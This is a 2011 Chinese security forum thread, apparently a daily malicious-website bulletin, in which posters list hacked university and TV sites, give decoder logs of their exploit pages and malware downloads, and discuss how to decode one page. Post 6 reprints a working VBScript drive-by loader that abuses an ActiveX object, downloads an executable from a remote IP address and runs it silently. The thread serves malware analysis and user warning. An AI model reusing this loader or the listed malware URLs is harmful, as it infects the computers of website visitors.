瑞星卡卡安全论坛技术交流区恶意网站交流每日网马播报 瑞星网站每日安全播报(2011年1月24日)

1   1  /  1  页   跳转

瑞星网站每日安全播报(2011年1月24日)

收藏
本主题由 大版主 networkedition 于 2012-2-21 15:38:57 执行 移动主题 操作
networkedition
头像
社区嘉宾
  • 帖子:36698
  • 注册: 2008-02-28
  • 来自:
论坛8周年活动礼物09欢乐圣诞10温馨圣诞
发表于: 2011-01-24 17:12 | 只看楼主 短消息 资料
字号: 1楼

瑞星网站每日安全播报(2011年1月24日)



引用:
网址均来自瑞星每日安全播报,我们详细分析其中所挂恶意网址,对于已失效的恶意网址就不再分析。



引用:
注:以下分析出的恶意网址均包含有真实网马下载地址,请勿直接下载并运行,以免系统中招。



引用:

1.  http://ciee.cau.edu.cn/(开放的中国农业大学欢迎您!)
2.  http://v.gxtv.cn/(广西电视网)
3.  http://gs.njtu.edu.cn/(北京交通大学)
4.  http://mec.dlmu.edu.cn/(大连海事大学)


用户系统信息:Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
最后编辑networkedition 最后编辑于 2011-01-24 17:17:51
分享到:
gototop
 
networkedition
头像
社区嘉宾
  • 帖子:36698
  • 注册: 2008-02-28
  • 来自:
论坛8周年活动礼物09欢乐圣诞10温馨圣诞
发表于: 2011-01-24 17:12 | 只看楼主 短消息 资料
字号: 2楼

回复:瑞星网站每日安全播报(2011年1月24日)

Log generated by anonymous use mdecoder 0.66
[root]http://ciee.cau.edu.cn/dqpy/index.asp(党旗飘扬 - 信息与电气工程学院)
    [flash]http://ciee.cau.edu.cn/dqpy/images/bgover.swf
    [exp][iframe]http://ciee.cau.edu.cn/dqpy/./xu_admin/list.htm
        [virus]http://202.205.89.194/8.exe   
    [script]http://ciee.cau.edu.cn/dqpy/count.asp
gototop
 
networkedition
头像
社区嘉宾
  • 帖子:36698
  • 注册: 2008-02-28
  • 来自:
论坛8周年活动礼物09欢乐圣诞10温馨圣诞
发表于: 2011-01-24 17:12 | 只看楼主 短消息 资料
字号: 3楼

回复:瑞星网站每日安全播报(2011年1月24日)

Log generated by anonymous use mdecoder 0.66
[root][exp]http://v.gxtv.cn/memory/ie.html
    [virus]http://v.gxtv.cn/memory/msi.exe
gototop
 
networkedition
头像
社区嘉宾
  • 帖子:36698
  • 注册: 2008-02-28
  • 来自:
论坛8周年活动礼物09欢乐圣诞10温馨圣诞
发表于: 2011-01-24 17:12 | 只看楼主 短消息 资料
字号: 4楼

回复:瑞星网站每日安全播报(2011年1月24日)

Log generated by anonymous use mdecoder 0.66
[root]http://gs.njtu.edu.cn/sqxx/live/ma/mp.htm(Exploit.Mpeg2.c)
    [script]http://gs.njtu.edu.cn/sqxx/live/ma/bb.jpg
    [script]http://gs.njtu.edu.cn/sqxx/live/ma/bb1.jpg
    [script]http://gs.njtu.edu.cn/sqxx/live/ma/ubb.jpg
    [script]http://gs.njtu.edu.cn/sqxx/live/ma/bbbb1.jpg
    [script]http://gs.njtu.edu.cn/sqxx/live/ma/bbbb.jpg
    [script]http://gs.njtu.edu.cn/sqxx/live/ma/bbbbb.jpg
    [virus]http://gs.njtu.edu.cn/phD/Images/dd.exe
gototop
 
networkedition
头像
社区嘉宾
  • 帖子:36698
  • 注册: 2008-02-28
  • 来自:
论坛8周年活动礼物09欢乐圣诞10温馨圣诞
发表于: 2011-01-24 17:13 | 只看楼主 短消息 资料
字号: 5楼

回复:瑞星网站每日安全播报(2011年1月24日)

Log generated by anonymous use mdecoder 0.66
[root]http://mec.dlmu.edu.cn/photo/x7.htm(Exploit.Ie0dayCVE0806.a)
    [script]http://mec.dlmu.edu.cn/photo/nb.js
    [script]http://mec.dlmu.edu.cn/photo/nb2.js
    [script]http://mec.dlmu.edu.cn/photo/nb3.js
    [virus]http://xuxiao1234.3322.org:88/nb.exe
gototop
 
学习解密
头像
初生襁褓狮
  • 帖子:50
  • 注册: 2009-08-18
  • 来自:
发表于: 2011-01-24 20:57 | 短消息 资料
字号: 6楼

回复: 瑞星网站每日安全播报(2011年1月24日)

http://ciee.cau.edu.cn/dqpy/./xu_admin/list.htm

我把xxx 什么的去掉得出来的 不知道正不正确 求个正确的解法

[复制到剪贴板]
CODE:
<HTML>
<HEAD>
<SCRIPT LANGUAGE="Javascript">
<!--
var Words ="<script language="VBScript">

on error resume next

pil1 = "Scripting.FileSystemObject"

pil2 = "Shell.Application"

wj="wins.exe"

strl="Microsoft.XMLHTTP"

strl4="object"

strl5="Adodb.Stream"

strl6="GET"

strl7="classid"

pi8="clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"

pi9 = "h000t000t000p://202.205.89.194/8.exe"



function chan(obt1)

chan=""

obt2 = len(obt1)

for i=1 to obt2 step 4

chan=chan+mid(obt1,i,1)

next

end function



pi1=chan(pil1)

pi2=chan(pil2)

str=chan(strl)

str4=chan(strl4)

str5=chan(strl5)

str6=chan(strl6)

str7=chan(strl7)

str8=chan(pi8)

dl=chan(pi9)



sub sub1(obt1,obt2)

df.setAttribute obt1,obt2

end sub

sub sub2(obt1,obt2,obt3,obt4,obt5,obt6)

obt1.type = obt3

obt2.Open obt4, obt5, obt6

obt2.Send

end sub

function fun1(obt1)

Set fun1 = document.createElement(obt1)

end function

function fun2(obt1)

set fun2 = df.createobject(obt1,"")

end function

sub fun3(obt1,obt2)

obt1.open

obt1.write obt2.responseBody

end sub

sub fun4(obt1,obt2,obt3)

obt1.savetofile obt2,obt3

end sub

function fun5(obt2,obt3)

set fun5 = obt2.createobject(obt3,"")

end function



Set df = fun1(str4)

sub1 str7,str8

Set x = fun2(Str)

set S = fun2(Str5)

sub2 S,x,1,str6,dl,false

call fun3(S,x)

fun4 S,fun2(pi1).BuildPath(fun2(pi1).GetSpecialFolder(2),wj),2

S.close

fun5(df,pi2).ShellExecute fun2(pi1).BuildPath(fun2(pi1).GetSpecialFolder(2),wj),"","","open",0



rem edit by labczm in cau



</script>





"
function SetNewWords()
{
var NewWords;
NewWords = unescape(Words);
document.write(NewWords);
}
SetNewWords();
// -->
</SCRIPT>
</HEAD>
<BODY>
</BODY>
</HTML>
gototop
 
njuptzc
头像
快乐黄口狮
  • 帖子:489
  • 注册: 2009-07-20
  • 来自:
发表于: 2011-01-24 22:14 | 短消息 资料
字号: 7楼

回复 6F 学习解密 的帖子

我解码一遍发现没有恶意代码了
Log generated by njuptzc use mdecoder 0.67
[root]http://ciee.cau.edu.cn/dqpy/index.asp(党旗飘扬 - 信息与电气工程学院)
    [flash]http://ciee.cau.edu.cn/dqpy/images/bgover.swf
    [iframe]http://ciee.cau.edu.cn/dqpy/./xu_admin/list.htm
    [script]http://ciee.cau.edu.cn/dqpy/count.asp
gototop
 
容光焕发
头像
初生襁褓狮
  • 帖子:1
  • 注册: 2011-01-25
  • 来自:
发表于: 2011-01-25 13:04 | 短消息 资料
字号: 8楼

回复:瑞星网站每日安全播报(2011年1月24日)
gototop
 
<<上一主题|下一主题>>
1   1  /  1  页   跳转
页面顶部
Powered by Discuz!NT